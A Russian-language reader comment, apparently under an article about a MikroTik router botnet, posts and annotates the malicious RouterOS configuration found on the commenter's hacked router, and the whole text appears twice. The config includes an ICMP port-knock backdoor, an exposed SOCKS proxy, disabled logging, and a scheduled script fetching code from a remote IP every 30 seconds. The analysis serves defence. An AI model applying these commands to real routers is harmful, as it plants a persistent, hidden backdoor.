Если честно, не совсем понимаю автора. Мой главный вопрос: «Чем вы прячете роутеры от ботнета?» Мой микротик взломали в августе месяце, разрешён был прокси сервис для некоторых клиентов, на которых грешу. Задампил всё это дело, присуствуют адреса кошельков, совпадающие с вашими в статье, и привожу с комментариями:
#В этом разделе добавляются все локальные сети всех интерфейсов на микротике в список allow-ip
/ip firewall address-list
add address=192.168.1.0/24 list=allow-ip
#Здесь в файрволе выключаются все правила с action DROP и в начале вставляются пять правил. Я их пронумеровал и прокоментировал
# 1. action=Tarpit — создаёт соединение, но не разрешает его, держит в памяти, позволяет флудом на порт 30553 исчерпать оперативку роутера
# 2. Здесь, если злоумышленник постучится пакетом ICMP с размером пакета 1083 байта, вносит себя в список описанный в начале «allow-ip», и где тут «I closed the vulnerability with a firewall»
# 3. Разрешает ВСЁ всем кто в списке allow-ip
# 4. Закрывает возможность сделать буфер оверфлоу по UDP DNS кому то ещё. Злоумышленник не хочет делится добычей.
# 5. Блокируются некоторые порты TCP локальных сервисов роутера, злоумышленник опять не хочет делится добычей с другими злоумышлениками
/ip firewall filter
1.add action=tarpit chain=input comment=«Add you ip addess to allow-ip in Address Lists.» dst-port=30553 protocol=tcp
2.add action=add-src-to-address-list address-list=allow-ip address-list-timeout=1h chain=input comment=«I closed the vulnerability with a firewall.» packet-size=1083 protocol=icmp
3.add action=accept chain=input comment=«Please update RouterOS and change password.» src-address-list=allow-ip
4.add action=drop chain=input comment=" You can say thanks on the WebMoney Z399578297824" dst-port=53 protocol=udp
5.add action=drop chain=input comment=«or BTC 14qiYkk3nUgsdqQawiMLC1bUGDZWHowix1» dst-port=53,8728,8729,21,22,23,80,443,8291 protocol=tcp
#disabled all drop rules
# Ниже включается сервис socks, через который коммуницирует вся бот сеть. Около 10 000 роутеров ломится по этому порту ко мне до сих пор но с меньшей интенсивностью. Заметте, этот порт TCP 4145 не блочится файрволом.
/ip socks
set enabled=yes port=4145
# Выключается весь лог, чтобы владелец не узнал о произошедшем как можно дольше, и чтобы мониторинг ничего не сказал.
/system logging
set 0 disabled=yes
set 1 disabled=yes
set 2 disabled=yes
set 3 disabled=yes
# deleted all entries
# Тут нет никакого телеграмма или обратной связи, но адреса кошельков совпадают с теми что в статье.
/system note
set note=«I closed the vulnerability with a firewall. Please update RouterOS. You can say thanks on the WebMoney Z399578297824 or BTC 14qiYkk3nUgsdqQawiMLC1bUGDZWHowix1»
# Здесь скрипт и его шедулер для запуска каждые 30 секунд или сразу после ребута, скриптов, что подкладываются в файл mikrotik.php на сервере 95.154.216.164
/system scheduler
add interval=30s name=schedule3_ on-event=script3_ policy=ftp,reboot,read,write,policy,test,password,sensitive start-time=startup
/system script
add name=script3_ policy=ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http"
P.S.: Вы пишите что вырвали из лап ботнета 100 000 устройств, но не приводите пример как именно это делаете. Вы приводите пример что защитили устройство пасхалкой, но эта пасхалка сама по себе зло, которое я описал выше, и появляется вместе со всем остальным кодом выше, что и есть бот сеть. В статье много нестыковок для того, кто столкнулся с проблемой лично. Вы либо плагиатите, поскольку адреса кошельков совпадают и вы утверждаете что они ваши, либо вы и есть злоумышленник, который притворяется что делает добро.
P.S.S: Роутер был настроен по принципу запрещено всё, что явно не разрешено. Пользователь на роутере был один со сгенерированным паролем, что означает что доступ был получен не подбором пароля, а через уязвимость нулевого дня. Возможность была по моему мнению одна — через прокси сервис, который был включён по белому списку только разрешенным клиентам по адрес-листу, компьютер одного из которых я подозреваю был заражен. Процедура взлома здесь нетривиальная, и я считаю разработчика этой бот сети высококлассным специалистом. Однако, в статье ни малейших примеров или намёков о методе получении доступа, и какую дыру автор призывает закрывать.
#В этом разделе добавляются все локальные сети всех интерфейсов на микротике в список allow-ip
/ip firewall address-list
add address=192.168.1.0/24 list=allow-ip
#Здесь в файрволе выключаются все правила с action DROP и в начале вставляются пять правил. Я их пронумеровал и прокоментировал
# 1. action=Tarpit — создаёт соединение, но не разрешает его, держит в памяти, позволяет флудом на порт 30553 исчерпать оперативку роутера
# 2. Здесь, если злоумышленник постучится пакетом ICMP с размером пакета 1083 байта, вносит себя в список описанный в начале «allow-ip», и где тут «I closed the vulnerability with a firewall»
# 3. Разрешает ВСЁ всем кто в списке allow-ip
# 4. Закрывает возможность сделать буфер оверфлоу по UDP DNS кому то ещё. Злоумышленник не хочет делится добычей.
# 5. Блокируются некоторые порты TCP локальных сервисов роутера, злоумышленник опять не хочет делится добычей с другими злоумышлениками
/ip firewall filter
1.add action=tarpit chain=input comment=«Add you ip addess to allow-ip in Address Lists.» dst-port=30553 protocol=tcp
2.add action=add-src-to-address-list address-list=allow-ip address-list-timeout=1h chain=input comment=«I closed the vulnerability with a firewall.» packet-size=1083 protocol=icmp
3.add action=accept chain=input comment=«Please update RouterOS and change password.» src-address-list=allow-ip
4.add action=drop chain=input comment=" You can say thanks on the WebMoney Z399578297824" dst-port=53 protocol=udp
5.add action=drop chain=input comment=«or BTC 14qiYkk3nUgsdqQawiMLC1bUGDZWHowix1» dst-port=53,8728,8729,21,22,23,80,443,8291 protocol=tcp
#disabled all drop rules
# Ниже включается сервис socks, через который коммуницирует вся бот сеть. Около 10 000 роутеров ломится по этому порту ко мне до сих пор но с меньшей интенсивностью. Заметте, этот порт TCP 4145 не блочится файрволом.
/ip socks
set enabled=yes port=4145
# Выключается весь лог, чтобы владелец не узнал о произошедшем как можно дольше, и чтобы мониторинг ничего не сказал.
/system logging
set 0 disabled=yes
set 1 disabled=yes
set 2 disabled=yes
set 3 disabled=yes
# deleted all entries
# Тут нет никакого телеграмма или обратной связи, но адреса кошельков совпадают с теми что в статье.
/system note
set note=«I closed the vulnerability with a firewall. Please update RouterOS. You can say thanks on the WebMoney Z399578297824 or BTC 14qiYkk3nUgsdqQawiMLC1bUGDZWHowix1»
# Здесь скрипт и его шедулер для запуска каждые 30 секунд или сразу после ребута, скриптов, что подкладываются в файл mikrotik.php на сервере 95.154.216.164
/system scheduler
add interval=30s name=schedule3_ on-event=script3_ policy=ftp,reboot,read,write,policy,test,password,sensitive start-time=startup
/system script
add name=script3_ policy=ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http"
P.S.: Вы пишите что вырвали из лап ботнета 100 000 устройств, но не приводите пример как именно это делаете. Вы приводите пример что защитили устройство пасхалкой, но эта пасхалка сама по себе зло, которое я описал выше, и появляется вместе со всем остальным кодом выше, что и есть бот сеть. В статье много нестыковок для того, кто столкнулся с проблемой лично. Вы либо плагиатите, поскольку адреса кошельков совпадают и вы утверждаете что они ваши, либо вы и есть злоумышленник, который притворяется что делает добро.
P.S.S: Роутер был настроен по принципу запрещено всё, что явно не разрешено. Пользователь на роутере был один со сгенерированным паролем, что означает что доступ был получен не подбором пароля, а через уязвимость нулевого дня. Возможность была по моему мнению одна — через прокси сервис, который был включён по белому списку только разрешенным клиентам по адрес-листу, компьютер одного из которых я подозреваю был заражен. Процедура взлома здесь нетривиальная, и я считаю разработчика этой бот сети высококлассным специалистом. Однако, в статье ни малейших примеров или намёков о методе получении доступа, и какую дыру автор призывает закрывать.